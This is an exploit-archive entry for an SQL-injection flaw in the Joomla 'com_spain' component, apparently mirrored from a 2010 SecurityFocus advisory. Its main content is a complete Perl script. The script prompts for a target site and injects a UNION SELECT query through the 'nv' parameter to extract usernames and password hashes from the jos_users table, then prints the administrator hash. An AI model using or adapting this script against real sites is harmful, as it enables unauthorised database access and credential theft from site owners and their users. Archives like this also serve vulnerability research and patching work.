Joomla! Component com_spain - nv SQL Injection

2010-09-20T00:00:00
ID EXPLOITPACK:32090B598469864D5B2F4FB46AB5AC51
Type exploitpack
Reporter FL0RiX
Modified 2010-09-20T00:00:00

Description

Joomla! Component com_spain - nv SQL Injection

                                        
                                            source: https://www.securityfocus.com/bid/43354/info

The Spain component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


#!/usr/bin/perl -w
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Fl0rix | Bug Researchers (c) 2010 |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Com_Spain Remote SQL Injection Exploit|\n\n";
print "\t\t| Greetz: EcHoLL,Sakkure And All My Friends |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
 
use LWP::UserAgent;
 
print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
 
$florix="concat(username,0x3a,password)";
$sakkure="jos_users";
 
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
 
$host = $target . "/index.php?option=com_spain&view=descr&task=home&nv=1/**/AND/**/1=0+UNION+SELECT/**/1,".$florix.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from/**/".$sakkure.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Tebrikler Bro Exploit Calisti! #\n\n";
}
else{print "\n[-] Malesef Bro Exploit Calismadi...\n";
}